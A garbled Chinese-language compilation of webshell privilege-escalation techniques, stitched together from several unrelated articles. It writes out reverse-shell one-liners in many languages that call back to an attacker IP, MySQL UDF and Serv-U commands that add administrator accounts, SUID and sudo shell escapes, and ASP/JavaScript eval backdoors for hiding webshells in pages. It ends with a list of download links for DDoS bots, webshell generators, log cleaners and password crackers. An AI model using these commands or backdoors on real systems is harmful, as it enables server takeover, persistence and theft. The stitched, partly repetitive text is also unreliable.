最全的WEBSHELL提权大大全
MySQL提权之udf提权(获得webshell的情况)
MySQL提权之udf提权(获得webshell的情况)什么是udf提权?MySQL提供了⼀个让使⽤者⾃⾏添加新的函数的功能,这种⽤户⾃⾏扩展函数的功能就叫udf。
它的提权原理也⾮常简单!即是利⽤了root ⾼权限,创建带有调⽤cmd的函数的udf.dll动态链接库!这样⼀来我们就可以利⽤ system权限进⾏提权操作了!当我们拿到webshell后,由于中间件,例如,apache使⽤了较低的权限,可能仅仅是个⽹络服务的权限,然后我们就需要进⾏提权,⽽有时候⽬标机器补丁较全,各种系统提权姿势都失效的情况下,可以将⽬光转义到数据库服务上,在Windows下,在较低版本的mysql(<5.6)安装时默认是系统权限。
还有就是很多⼈图⽅便,例如使⽤了各种集成环境,未做安全设置,直接⽤⾼权限账户进⾏站点配置,就可以考虑⽤UDF进⾏提权。
dll⽂件的好处?1.扩展了应⽤程序的特性;2.可以⽤许多种编程语⾔来编写;3.简化了软件项⽬的管理;4.有助于节省内存;5.有助于资源共享;什么是udf库?UDF表⽰的是MySQL中的⽤户⾃定义函数。
这就像在DLL中编写⾃⼰的函数并在MySQL中调⽤它们⼀样。
我们将使⽤“lib_mysqludf_sys_64.dll”DLL 库不同版本的区别:MySql < 4.1:允许⽤户将任何的DLL⽂件⾥⾯的函数注册到MySql⾥。
MySql 4.1-5.0:对⽤来注册的DLL⽂件的位置进⾏了限制,通常我们选择 UDF导出到系统⽬录C:/windows/system32/来跳过限制。
MySql >=5.1:这些DLL只能被放在MySql的plugin⽬录下。
0x01 提权的前提1. 必须是root权限(主要是得创建和抛弃⾃定义函数)2. secure_file_priv=(未写路径)3. 将udf.dll⽂件上传到MySQL的plugin⽬录下(这⾥以MySQL>=5.1为例)0x02 开始提权这⾥以本地为例1.我们这⾥上传了⼀句话,然后⽤菜⼑连接上先判断数据库版本select version();符合MySql>=5.1的情况。
常见提权方法
常见提权方法1. 用户提权:用户提权是指普通用户通过某种方式获取管理员权限或超级用户权限的行为。
常见的用户提权方法包括:利用弱密码、使用系统漏洞、利用特权提升程序等。
详细描述:用户提权是黑客经常使用的一种手段,通过获取管理员权限,黑客可以执行更高级别的操作,如修改系统配置、访问敏感文件等。
利用弱密码是最常见的用户提权方法之一。
黑客可以使用密码破解工具或暴力破解技术尝试猜解用户密码,一旦成功登录系统,就可以获取管理员权限。
系统漏洞也是用户提权的常见方法之一。
黑客可以通过渗透测试或漏洞扫描等方式发现系统中的漏洞,然后利用这些漏洞获取管理员权限。
某个系统可能存在一个未修补的漏洞,黑客可以利用这个漏洞上传特制的脚本,从而获得系统的控制权。
黑客还可以利用特权提升程序来提权。
这些程序的功能是在受限的用户权限下执行特权操作,如创建新用户、修改用户组等。
黑客可以通过执行这些特权提升程序来获取管理员权限,从而获得系统的完全控制权。
2. 命令注入:命令注入是指黑客通过在输入框或URL参数中注入恶意命令,从而执行非授权的操作。
常见的命令注入方法包括:通过修改URL参数、利用操作系统命令执行漏洞等。
详细描述:命令注入是一种常见的网络攻击手法,黑客通过在输入框或URL参数中注入恶意命令,从而执行非授权的操作。
黑客可以在一个搜索框中输入特定的字符串,以执行系统命令,或是通过改变URL参数来获取系统权限。
命令注入通常利用了操作系统的命令执行漏洞。
当用户传递的输入被直接用于构造系统命令时,如果没有正确进行输入验证和过滤,黑客就可以通过构造恶意输入来执行非授权的操作。
这种攻击方式在许多Web应用程序中非常常见,如论坛、博客等。
为了防止命令注入攻击,开发者应该始终对用户输入进行适当的验证和过滤。
可以使用特定的字符过滤器来禁止或转义危险的字符,或是通过使用参数化查询和预编译语句等方式防止SQL注入。
3. 文件包含漏洞:文件包含漏洞是指黑客通过利用应用程序中的文件包含功能来执行恶意代码。
webshell msf 提权方法
webshell msf 提权方法
Webshell是一种可以用来执行命令的脚本,通常用于攻击者在受害者的服务器上执行恶意操作。
MSF(Metasploit Framework)是一种流行的渗透测试工具,可以用于执行各种攻击和提权操作。
以下是使用MSF进行Webshell提权的一般步骤:
1. 获取Webshell:首先,攻击者需要将Webshell上传到受害者的服务器上。
这可以通过多种方式完成,例如通过文件上传漏洞、利用Web应用程序漏洞或其他漏洞。
2. 扫描目标:一旦Webshell上传成功,攻击者可以使用MSF的扫描器来扫描目标服务器的漏洞和弱点。
这可以帮助攻击者确定哪些用户和系统具有潜在的提权机会。
3. 执行攻击:一旦攻击者确定了潜在的提权机会,他们可以使用MSF的各种攻击模块来尝试提权。
这可能包括利用系统漏洞、使用缓冲区溢出攻击、执行命令注入等。
4. 获取权限:如果攻击成功,攻击者将获得对目标服务器的权限。
这可能包括管理员权限或其他高权限。
需要注意的是,这些步骤只是一个一般性的概述,并且实际情况可能因目标系统和环境而异。
此外,使用这些技术进行非法活动是非法的,并且可能导致严重的法律后果。
因此,建议仅在合法和授权的情况下使用这些技术。
九种经典的Webshell提权
说到花了九牛二虎的力气获得了一个webshell,当然还想继续获得整个服务器的admin权限,正如不想得到admin的不是好黑客~嘻嘻~~好跟我来,看看有什么可以利用的来提升权限第一如果服务器上有装了pcanywhere服务端,管理员为了管理方便也给了我们方便,到系统盘的Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/中下载*.cif本地破解就使用pcanywhere连接就ok了第二有很多小黑问我这么把webshell的iis user权限提升一般服务器的管理都是本机设计完毕然后上传到空间里,那么就会用到ftp,服务器使用最多的就是servu那么我们就利用servu来提升权限通过servu提升权限需要servu安装目录可写~好开始把,首先通过webshell访问servu安装文件夹下的ServUDaemon.ini把他下载下来,然后在本机上安装一个servu把ServUDaemon.ini放到本地安装文件夹下覆盖,启动servu添加了一个用户,设置为系统管理员,目录C:\,具有可执行权限然后去servu安装目录里把ServUDaemon.ini更换服务器上的。
用我新建的用户和密码连接~好的,还是连上了ftpftp>open ipConnected to ip.220 Serv-U FTP Server v5.0.0.4 for WinSock ready...User (ip:(none)): id //刚才添加的用户331 User name okay, please send complete E-mail address as password. Password:password //密码230 User logged in, proceed.ftp> cd winnt //进入win2k的winnt目录250 Directory changed to /WINNTftp>cd system32 //进入system32目录250 Directory changed to /WINNT/system32ftp>quote site exec net.exe user rover rover1234 /add //利用系统的net.exe 文件加用户。
webshell的分类
webshell的分类Webshell可以按照其功能、原理和用途进行分类。
1. 命令执行型Webshell:这些Webshell通常允许攻击者在受感染的系统上执行命令,可以用来浏览文件、上传/下载文件、修改配置文件、执行系统命令等。
2. 文件管理型Webshell:这些Webshell提供了类似于文件管理器的界面,允许攻击者通过上传、下载、删除和编辑文件来管理受感染系统的文件系统。
3. 数据库管理型Webshell:这些Webshell专门用于管理数据库,允许攻击者执行SQL查询、添加/删除/修改数据库中的数据,以及执行其他与数据库相关的操作。
4. 弱口令猜解型Webshell:这些Webshell通过尝试猜解目标系统的用户名和密码来获取对系统的控制权限。
5. 反弹Shell型Webshell:这些Webshell利用系统上开放的网络服务,如FTP、SMTP、HTTP等,将命令结果反馈给攻击者的控制服务器,以实现远程控制。
6. 文件上传型Webshell:这些Webshell的主要功能是将自身安装到目标服务器上,通常是通过上传恶意文件来实现的。
7. 被动式Webshell:这些Webshell充当拦截器,截获正常用户对目标系统的请求,并将其重定向到攻击者控制的Webshell页面。
8. 混淆型Webshell:这些Webshell使用各种技术和方法来混淆其代码,使其更难被检测和分析。
需要注意的是,这些分类是相对的,有些Webshell可能具备多种功能。
此外,Webshell的进化和技术不断更新,新的类型和变种不断出现,因此对Webshell的分类是一个动态的过程。
提权以及反弹shell一些方法
提权以及反弹shell⼀些⽅法提权以及反弹shellnetcat反弹shellkali中使⽤nc(netcat)进⾏监听⽤法 : nv -lvvp 2333(端⼝号)靶机中使⽤ bash -c 'bash -i >&/dev/tcp/192.168.1.1/2333 0>&1' 同样可以写成⼀句话⽊马进⾏反弹shell。
命令提权1、使⽤suid提权,找到⼀个属于root的具有s权限的⽂件;s是提权符find / -user root -perm -4000 -print 2>/dev/nullfind / -perm -u=s -type f 2>/dev/nullfind / -user root -perm -4000 -exec ls -ldb {} \;例如:在DC-1中,⾸先touch新建⼀个⽂件,然后执⾏touch abcdfind abcd -exec whoami \;find / -name abcd -exec "/bin/sh" \; #分号需要转义,find以分号结尾具有提权功能的Linux可执⾏⽂件包括:nmapvimfindbashmorelessnanocppython反弹shell#!/usr/bin/pythonimport os,subprocess,sockets=socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect(("攻击机IP地址","攻击机监听端⼝"))os.dup2(s.fileno(),0)os.dup2(s.fileno(),1)os.dup2(s.fileno(),2)p=subprocess.call(["/bin/sh","-i"])其他⼀些⽅法#bash版本:bash -i >& /dev/tcp/10.0.0.1/8080 0>&1#perl版本:perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' #python版本:python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'#php版本:php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'#ruby版本:ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'#nc版本:nc -e /bin/sh 10.0.0.1 1234rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/fnc x.x.x.x 8888|/bin/sh|nc x.x.x.x 9999#java版本r = Runtime.getRuntime()p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])p.waitFor()#lualua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"git提权sudo -l 查看具有sudo执⾏权限的命令sudo git -p help或者 sudo git help config!/bin/bashzip提权touch exploitsudo -u root zip exploit.zip exploit -T --unzip-command="sh -c /bin/bash"tar提权收集信息:内外⽹服务器系统和版本位数服务器的补丁情况服务器的安装软件情况服务器的防护软件情况端⼝情况⽀持脚本情况信息收集常⽤命令:Windows:ipconfig /allnet usernetstat -anoversysteminfotasklist /svctaskkill -PID pid号taskkill /im qq.exe /fnet user test 123456 /addnet localgroup administrators test /addwhoamiCMD⽆法执⾏1、防护软件拦截2、CMD被降权3、组件被删除找可读写⽬录上传cmd.exe,将执⾏的cmd.exe路径替换成上传的路径查找3389端⼝1、注册表读取2、⼯具扫描3、命令探针端⼝转发lcx⽹站服务器是内⽹IP:192.168.2.3外⽹服务器IP是:192.168.80.151在内⽹服务器上执⾏的lcx命令是:lcx.exe -slave 192.168.80.151 51 192.168.2.3 3389在外⽹服务器上执⾏的lcx命令是:lcx.exe -listen 51 3389数据库提权MSSQL提权:安装组件--->开启3389---->创建⽤户------>提升权限------>完成Mysql提权:1、udf提权获取到对⽅数据库⽤户root的账号密码查看⽹站源码⾥⾯数据库配置⽂件(common,config.php,common.inc.php,data)查看数据库的配置⽂件暴⼒破解、mysql密码破解、3306端⼝⼊侵udf提权原理:通过root权限导出udf.dll到系统⽬录下,可以通过udf.dll调⽤执⾏cmd导出到\lib/plugin\安装⽬录下create function cmdshell returns string soname 'udf.dll'select cmdshell('net user test 123456 /add');select cmdshell('net localgroup administrators test /add');drop function cmdshell //删除函数2、启动项提权1、查看我们进⼊数据库中有什么表show tables;默认情况下,test中没有任何表的存在关键部分:2、在test数据库下创建⼀个新的表create table a(cmd text);表名为a,字段名为cmd,为text⽂本3、在表中插⼊数据insert into a values ("set wshshell=createobject(""wscript.shell"")");insert into a values ("a=wshshell.run(""cmd.exe /c net user test 123456 /add"",0)");insert into a values ("b=wshshell.run(""cmd.exe /c net localgroup Administrators test /add"",0)")双引号和括号以及后⾯的0⼀定要输⼊,⽤这三条命令建⽴⼀个vbs的脚本程序!4、查看数据表select * form a;5、输出表为⼀个vbs的脚本⽂件select * from a into outfile "c://开机菜单//启动//a.vbs";6、重启3、mof提权4、反连端⼝提权Windows提权:开启3389使⽤批处理⽂件开3389使⽤sql语句开3389使⽤exe开3389使⽤vb开3389使⽤wireshark或cain嗅探3389获取账号名和密码Linux提权:uname -r 查看内核版本信息找到对应版本的exp上传----编译---运⾏----ok。
webshell的隐藏
webshell 的隐藏—隐藏木马后门经验分享1.插马法 其实,我们可以直接把一句话插入已经存在的页面了,但是,问题出来了,像常用的 %execute(request(a))% %execute(request(value))% %eval request(#)% %if request(cnxhacker) then Session(b)=request(cnxhacker) if Session(b) then execute Sess1.插马法其实,我们可以直接把一句话插入已经存在的页面了,但是,问题出来了,像常用的<%execute(request("a"))%> <%execute(request("value"))%> <%eval request("#")%> <%if request("cnxhacker")<>"" thenSession("b")=request("cnxhacker") if Session("b")<>"" then execute Session("b")%> 等等,这些一句话一插进去的话,就会报错,一下就会被发现...其实,我们忽略了一个天天在用的S 端<SCRIPT RUNAT=SERVERLANGUAGE=JAVASCRIPT>eval(Request.form('#')+'')</SCRIPT> 冰狐的一句话客户端,这个调用的是Javascript 脚本,跟调用Vbscript 不同,Javascript 是运行在客户端的,也就上一HTML 端,所以我们可以直接把他插入在页面中,而不报错。
最全Windows提权总结(建议收藏)
最全Windows提权总结(建议收藏)当以低权⽤户进去⼀个陌⽣的windows机器后,⽆论是提权还是后续做什么,第⼀步肯定要尽可能的搜集信息。
知⼰知彼,才百战不殆。
常规信息搜集systeminfo 查询系统信息hostname 主机名net user 查看⽤户信息netstat -ano|find "3389" 查看服务pid号wmic os get caption 查看系统名wmic qfe get Description,HotFixID,InstalledOn 查看补丁信息wmic product get name,version 查看当前安装程序wmic service list brief 查询本机服务wmic process list brief 查询本机进程net share 查看本机共享列表netsh firewall show config 查看防⽕墙配置常见的杀软如下:360sd.exe 360杀毒360tray.exe 360实时保护ZhuDongFangYu.exe 360主动防御KSafeTray.exe ⾦⼭卫⼠SafeDogUpdateCenter.exe 安全狗McAfee McShield.exe McAfeeegui.exe NOD32AVP.exe 卡巴斯基avguard.exe ⼩红伞bdagent.exe BitDefender要搜集的信息⼤致如下⼏点:机器的系统及其版本机器的打补丁情况机器安装的服务机器的防⽕墙策略配置机器的防护软件情况提权简介提权可分为纵向提权与横向提权:纵向提权:低权限⾓⾊获得⾼权限⾓⾊的权限;横向提权:获取同级别⾓⾊的权限。
Windows常⽤的提权⽅法有:系统内核溢出漏洞提权、数据库提权、错误的系统配置提权、组策略⾸选项提权、WEB中间件漏洞提权、DLL劫持提权、滥⽤⾼危权限令牌提权、第三⽅软件/服务提权等1、系统内核溢出漏洞提权#⼿⼯查找补丁情况systeminfo查看补丁wmic qfe get Description,HotFixID,InstalledOn 查看补丁信息#MSF后渗透扫描post/windows/gather/enum_patches利⽤(Vulmap、Wes、WindowsVulnScan)对⽐补丁进⽽进⾏提权2、at命令利⽤在Windows2000、Windows 2003、Windows XP 这三类系统中,我们可以使⽤at命令将权限提升⾄system权限。
老树开花-利用IIS写权限漏洞+Serv-U提权拿服务器
老树开花-利用IIS写权限漏洞+Serv-U提权拿服务器2011年03月31日星期四 15:43声明:本文没有任何技术含量,99.99%的内容是炒冷饭。
写这篇文章的目的在于:提醒大家不要忘了那些曾经很黄很暴力的漏洞,老洞常温,拿站很稳。
o(∩_∩)o第一大步:获取WebShell其实,一开始并没有准备搞渗透,只不过是想用IIS PUT Scanner 扫几台网络摄像头玩玩。
正应了那句老话:有心栽花花不开,无心插柳柳成荫。
Net Camera没找到,倒是意外地发现了2台有IIS 写权限漏洞的服务器。
怎么办?纠结,“整“!!!试了下IIS IIS PUT Scanner自带的上传功能,结果挂了!这时候千万不要放弃,经验告诉我,IIS IIS PUT Scanner的上传功能很不给力,完全是鸡肋嘛!换抢,试试老兵的IIS 写权限利用工具。
尝试PUT一个后缀为txt的ASP大马,返回信息:201 Created,运气很好,创建成功。
有的玩了:-)不过不要高兴的太早,马儿目前还是以TXT的格式躺在服务器里。
要使它跑起来,就要用到MOVE方法(类似Linux的重命名操作)将其转换成ASP格式,当然前提是服务器支持ASP,否则一切活动到此为止吧!RP大爆发!居然成功了,默认地址是/shell.asp。
如果MOVE方法不行,可以试试Copy 方法,做事不要一根筋嘛!第二大步:提权老规矩,执行CMD命令。
要是没CMD执行权限,找个可写目录上传下就O了。
我这里可以直接执行,一切都很顺利。
正因为如此,开篇才说本文没任何技术含量。
NetStat -an,神马情况,43958?Serv_U。
笑吧!提权在握。
果断点击Serv-U提权,啥命令也没改,使用默认Seru_U用户名和密码登录。
这么垃圾的管理员,肯定不会去改动滴。
接下来用同样的方法,执行了一个开3389的批处理,这种东西网上满天飞。
更棒的是,2003开3389后不用重启,直接登录。
WEBSHELL权限提升技巧
WEBSHELL权限提升技巧WEBSHELL权限提升技巧c: d: e:.....C:\Documents and Settings\All Users\「开始」菜单\程序\看这⾥能不能跳转,我们从这⾥可以获取好多有⽤的信息⽐如Serv-U的路径,C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\看能否跳转到这个⽬录,如果⾏那就最好了,直接下它的CIF⽂件,破解得到pcAnywhere密码,登陆c:\Program Files\serv-u\C:\WINNT\system32\config\下它的SAM,破解密码c:\winnt\system32\inetsrv\data\是erveryone 完全控制,很多时候没作限制,把提升权限的⼯具上传上去,然后执⾏c:\prelC:\Program Files\Java Web Start\c:\Documents and Settings\C:\Documents and Settings\All Users\c:\winnt\system32\inetsrv\data\c:\Program Files\c:\Program Files\serv-u\C:\Program Files\Microsoft SQL Server\c:\Temp\c:\mysql\(如果服务器⽀持PHP)c:\PHP(如果服务器⽀持PHP)运⾏"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限还可以⽤这段代码试提升,好象不是很理想的如果主机设置很变态,可以试下在c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写⼊bat,vbs等⽊马。
Webshell提权 + 网站后台攻击实验报告
用明小子上的后台连接直接进其后台界面
进行黑客行动
上传一个木马到网页上面,方法如下: 1.先进其后台管理页面 2.上传小马 3.备份数据库 4.修改大马的密码 5.上传大马代码 6.进入webshell后,进行下一步动作………
上传木马 进入管理页面
1.进入图片管理界面 2.点上传图片 3.将我们的ASP小马文件改成.jpg格式的文件 4.上传图片后将上传成功后的图片名称复制下来,为下步做准备。
⑤
网站提权---入侵者惯用做法,通过注入、服务器及软件的本身 漏洞提权,使其得到webshell,从而掌握服务器的最高管理权限Βιβλιοθήκη 三、webshell 提权
常见的webshell提权方法 serv-u服务器提权(serv-u目录有修改权限的情况)
pcanywhere提权 FlashFXP替换文件提权(利用社会工程学) 利用radmin提权
MYSQL root密码提权
案例:网站后台攻击
一、工具介绍
注入工具:啊D 旁注工具: 明小子 编译工具:UltraEdit MD5在线查询动网密码
二、攻击过程
第一步 用啊D工具搜索关键字Article_Class2.asp? 找有注入点的网站。 第二步 用明小子这个旁注工具查找可注入站点用 户账号和密码 。 第三步 用明小子扫后台站点。 第四步 用MD5破解密码。 第五步 进后台,进行黑客行动…….
资料来源: /internet/detail_2012_02/09/12383183_0.shtml
世界知名的Web安全研究组织OWASP提供的报告,目前对Web业务系统 威胁最严重的两种攻击方式是注入漏洞和跨站脚本漏洞
1433提权详解
1433提权详解!!!随着网络安全意识的提高,很多服务器的安全防范都非常严了,本人对web入侵是一巧不通就只会扫扫1433弱口令的服务器,于是研究一段时间,虽然进步不大,但是还是想把经验分享一下,正所谓授人以鱼不如授人以渔,而我现在正是告诉你打鱼的方法,下面就以一台服务器为例了,本例使用工具为SQL TOOLS 2.0,论坛有下,请自行搜索。
插播不是广告的广告:该工具集成度高,简单的sql指令无须使用分离器,直接在此工具中执行即可,其文件管理功能非常强大,反正我用着太顺手了,推荐一下,本文原创发布于=华夏黑客同盟论坛=()广告完毕。
把扫到的ip和sa及口令填入连接后,用dos命令功能试试列目录显示错误信息:Error Message:无法装载 DLL xplog70.dll 或该 DLL 所引用的某一 DLL。
原因: 126(找不到指定的模块。
)。
这种情况大家在提权过程中经验遇到啊,它是由于xplog70.dll这个文件被删除或者做了其他限制,导致出现这个错误的这个错误的直接后果就是sql数据库的xp_cmdshell的存储过程无法使用,无法执行命令提权自然就无从说起了,当然我们还可以考虑其他的存储过程如:sp_oacreate和sp_oamethod来直接添加帐号,或者使用沙盘指令来提权,但这台服务器,这些功能都被限制了,还是考虑下恢复xplog70.dll了,测试上传无法成功,这条路走不通了,这时就考虑用到工具的文件管理功能了看到了把,和windows的资源管理器一样好用,目录列出来了,搜索一下可以用来提权的东西吧,这里我们首先要去看看sql的安装路径里的xplog70.dll文件是否存在看到吧,xplog70.dll文件不见了,被删除了,xpweb70.dll也被改了名字了-. - 继续搜寻下其他盘看看还有什么东西d盘下有几个网站和几个论坛,这些都是有用的信息,一旦sql的错误无法恢复的时候,我们就可以考虑通过这些网站来进行提权了,网站的提权,我就是搞不定,痛苦啊==!!继续搜索在e盘下竟然有个sql2000的原始安装文件备份,怦然心动的感觉是美妙的,感谢我们亲爱的服务器管理员大人,看看这是什么====e:\备份软件\MS Sql 2000\DEVELOPER\X86\BINN\那我们就开始恢复试试吧,切换到sql命令项,输入指令exec sp_dropextendedproc 'xp_cmdshell' //这个指令是删除sql数据库的xp_cmdshell的存储过程接着输入指令,重新加载新路径的存储过程。
黑客工具及下载大全
1、啊D注入工具破解版/user/hackerxfiles/file/9595692、Domain3.5干净版本/user/hackerxfiles/file/9595733、GetWebshellah56bug大众版/user/hackerxfiles/file/9595744、HDSI2.5/user/hackerxfiles/file/9595765、HDSI3.0/user/hackerxfiles/file/9595786、jsp暴源代码工具/user/hackerxfiles/file/9595827、cookie注入工具/user/hackerxfiles/file/9595718、ASPX暴绝对路径的工具/user/hackerxfiles/file/9595709、Oracle 专用注射器[线程版]/user/hackerxfiles/file/95958310、PHP-Mysql注射分析器/user/hackerxfiles/file/95958411、php注入辅助工具phpsend7z/user/hackerxfiles/file/95958512、国外超级注射工具/user/hackerxfiles/file/95956213、明小子的php注入工具ISAC/user/hackerxfiles/file/95956114、旁注- 网站小助手/user/hackerxfiles/file/95955915、网站猎手2/user/hackerxfiles/file/95955716、支持GET、POST、Cookie注入扫描和注入工具/user/hackerxfiles/file/95955317、注入工具/user/hackerxfiles/file/959552二、入侵权限提升工具1、ASP版Serv-U提权工具[Goldsun]/user/hackerxfiles/file/9595922、L.Z网络小组vip专用提权工具集/user/hackerxfiles/file/9595943、langouster_udf.dll 专用网马.php/user/hackerxfiles/file/9595954、NC/user/hackerxfiles/file/9595965、PcanywhereReader For Lake2-EV AL/user/hackerxfiles/file/9595976、pcAnywhere看密码工具/user/hackerxfiles/file/9595987、Radmin本地提权exp /user/hackerxfiles/file/9595998、Serv-U 6.X 版本Exp /user/hackerxfiles/file/9596039、Serv-U 6.X 提权脚本.vbs10、Serv-U提权综合工具/user/hackerxfiles/file/95960511、serv-u中添加帐号/user/hackerxfiles/file/95960612、shift后门2 /user/hackerxfiles/file/95960713、SHIFT后门功能版源码/user/hackerxfiles/file/95960814、SU提权程序ASPX /user/hackerxfiles/file/95960915、WinlogonHack /user/hackerxfiles/file/95961016、Winlogon劫持记录3389密码小工具(开源代码)/user/hackerxfiles/file/95961117、本地提权之Sys.exe黑客手册专用版/user/hackerxfiles/file/95961218、桂林老兵Asp.dll权限提升的工具/user/hackerxfiles/file/95961319、海盗webshell提权工具包/user/hackerxfiles/file/95961420、开3389+非net创建管理用户+Shift后门+自删除脚本/user/hackerxfiles/file/95961621、万能开3389+克隆Guest集合工具/user/hackerxfiles/file/959619三、小马大马1、ASP木马集合/user/hackerxfiles/file/9596652、ASP万能溶剂/user/hackerxfiles/file/9596643、lake2的eval最小马发送端/user/hackerxfiles/file/9596634、nohackasp木马生成器/user/hackerxfiles/file/9596625、PHP4cpv2.0微型大马版/user/hackerxfiles/file/9605066、PhpFile测试版2.0/user/hackerxfiles/file/9605087、PHP木马修改增强版/user/hackerxfiles/file/9605058、PHP批量挂马脚本/user/hackerxfiles/file/9605049.SqlRootkit/user/hackerxfiles/file/95966110、webshell生成器/user/hackerxfiles/file/96051111、Xall.php-批量查询插入一句话.php/user/hackerxfiles/file/96050912、xixiWebShell大马生成器/user/hackerxfiles/file/96051213、ZV新型PHP一句话木马客户端GUI版(Include利用方式)/user/hackerxfiles/file/96050714、冰狐浪子ASP后门v2.0/user/hackerxfiles/file/95966015、多功能脚本木马生成器[火狐版]/user/hackerxfiles/file/96051316、海阳顶端asp木马2006eval版/user/hackerxfiles/file/95965917、海阳顶端网ASP木马2006+正式版/user/hackerxfiles/file/95965618、黑眼睛Webshell2.0免杀版/user/hackerxfiles/file/96051419、火狐asp木马生成器/user/hackerxfiles/file/96051520、雷客图ASP站长安全助手/user/hackerxfiles/file/95965721、一句话木马服务端/user/hackerxfiles/file/959658四、SQL系列入侵工具1、MSSQL上传利用工具/user/hackerxfiles/file/9605762、Mysqlexec & Mssqlexec /user/hackerxfiles/file/9605923、SqlExec/user/hackerxfiles/file/9605914、SQLExplorer/user/hackerxfiles/file/9605895、SQLTools/user/hackerxfiles/file/9605886、SQL版低权限CMD命令执行工具/user/hackerxfiles/file/9605877、SQL查询分析器休闲山庄专用版/user/hackerxfiles/file/9605848、备份数据库利用工具/user/hackerxfiles/file/9605839、蝉之刃1.5/user/hackerxfiles/file/96058210、辅臣数据库浏览器/user/hackerxfiles/file/96058111、极速MSSQL弱口令扫描修正/user/hackerxfiles/file/96057912、数据库管理助手/user/hackerxfiles/file/960577五、DDOS拒绝服务攻击1、ASPX傀儡木乃伊(ASPX SYN DDOS)/user/hackerxfiles/file/9596312、NB网络僵尸/user/hackerxfiles/file/9596323、NetBotAtt14En/user/hackerxfiles/file/9596334、TB暗夜精灵汉化版/user/hackerxfiles/file/9596345、幻影DDOS僵尸/user/hackerxfiles/file/9596356、金装特南DDoS/user/hackerxfiles/file/9596367、傀儡僵尸1.4VIP会员完美本地验证/user/hackerxfiles/file/9596378、盘古VIP[破解]/user/hackerxfiles/file/9596409、上兴网络僵尸2007/user/hackerxfiles/file/95964110、世纪力天攻击器/user/hackerxfiles/file/95964211、蜥蜴Vip/user/hackerxfiles/file/95964412、小鱼压力测试/user/hackerxfiles/file/95964513、英武工作室傀儡僵尸VIP1.4/user/hackerxfiles/file/95964814、中国制造网络僵尸2008商业测试版/user/hackerxfiles/file/959646六、踩点扫描工具1、135端口扫描优化版/user/hackerxfiles/file/9605202、IIS写权限扫描工具/user/hackerxfiles/file/9605213、mysql弱口令扫描器/user/hackerxfiles/file/9605234、尖刀超级端口扫描器V2.0七、代理工具1、getproxy2/user/hackerxfiles/file/9605442、I-Faker Desktop Pro(国外的CC)/user/hackerxfiles/file/9605463、代理超人/user/hackerxfiles/file/9605524、代理跳板Proxifierv2.7/user/hackerxfiles/file/9605585、proxyfire烈火代理/user/hackerxfiles/file/9605486、WinEggDrop写的代理跳板程序/user/hackerxfiles/file/9605497、变异CC攻击器/user/hackerxfiles/file/9605518、代理跳板Proxifierv2.7/user/hackerxfiles/file/9605589、花刺代理验证/user/hackerxfiles/file/960561八、痕迹清除1、CleanIISLog /user/hackerxfiles/file/9605332、clear3389/user/hackerxfiles/file/9605343、清除IIS日志logcleaner1.0/user/hackerxfiles/file/9605354、日志清除器/user/hackerxfiles/file/9605365、组策略清除工具1.1/user/hackerxfiles/file/960537九、密码字典生成器1、N.C.P.H社会工程学字典生成器/user/hackerxfiles/file/9605972、疯狂字典1.0/user/hackerxfiles/file/9605983、黑客字典II/user/hackerxfiles/file/9605994、万能密码生成字典/user/hackerxfiles/file/9606005、易优字典/user/hackerxfiles/file/9606026、专业密码生成器V2.6破解版/user/hackerxfiles/file/960603十、密码破解(包含压缩包,office系列,MD5,邮箱等密码破解工具)1、DeMD5暴力破解/user/hackerxfiles/file/9606122、Edward's WPS2000 Password Recovery V1.0/user/hackerxfiles/file/9606173、Intelore RAR Password Recovery/user/hackerxfiles/file/9606194、MailCrack/user/hackerxfiles/file/9606325、MD5SHA高级解密器V2.55/user/hackerxfiles/file/9606136、MD5破解工具包/user/hackerxfiles/file/9606157、MS Word文档保护破解器/user/hackerxfiles/file/9606218、office解密工具/user/hackerxfiles/file/9606229、PasswordZillaSetup/user/hackerxfiles/file/96061610、PDF Password Remover v2.5/user/hackerxfiles/file/96062311、WinRAR 密码破解工具/user/hackerxfiles/file/96062412、Word Password Recovery Master v1.0.0.6/user/hackerxfiles/file/96062613、WORD密码破解工具/user/hackerxfiles/file/96062814、密码xxx v2.3/user/hackerxfiles/file/96063315、溯雪7/user/hackerxfiles/file/96063416、压缩文件密码恢复工具/user/hackerxfiles/file/960630十一、数据嗅探工具1、Cain & Abel v4.9/user/hackerxfiles/file/9596682、sniffdoor/user/hackerxfiles/file/9596703、WinArpSpoofer/user/hackerxfiles/file/9596714、xsniff/user/hackerxfiles/file/9596735、X-Spoof工具/user/hackerxfiles/file/9596746、超级嗅探工具Dsniffforwin/user/hackerxfiles/file/9596757、网络抓包器V1.3/user/hackerxfiles/file/9596808、哑巴嗅探器2.86/user/hackerxfiles/file/9596819、幽灵网络嗅探器/user/hackerxfiles/file/959683十二、破解工具1、ODV1.10正式汉化修改版/user/hackerxfiles/file/9610332、PEid 0.94/user/hackerxfiles/file/9610373、LordPE V1.4自动脱壳/user/hackerxfiles/file/9610384、Import Fix 1.6修复工具/user/hackerxfiles/file/9610389。
WebShell密码大全
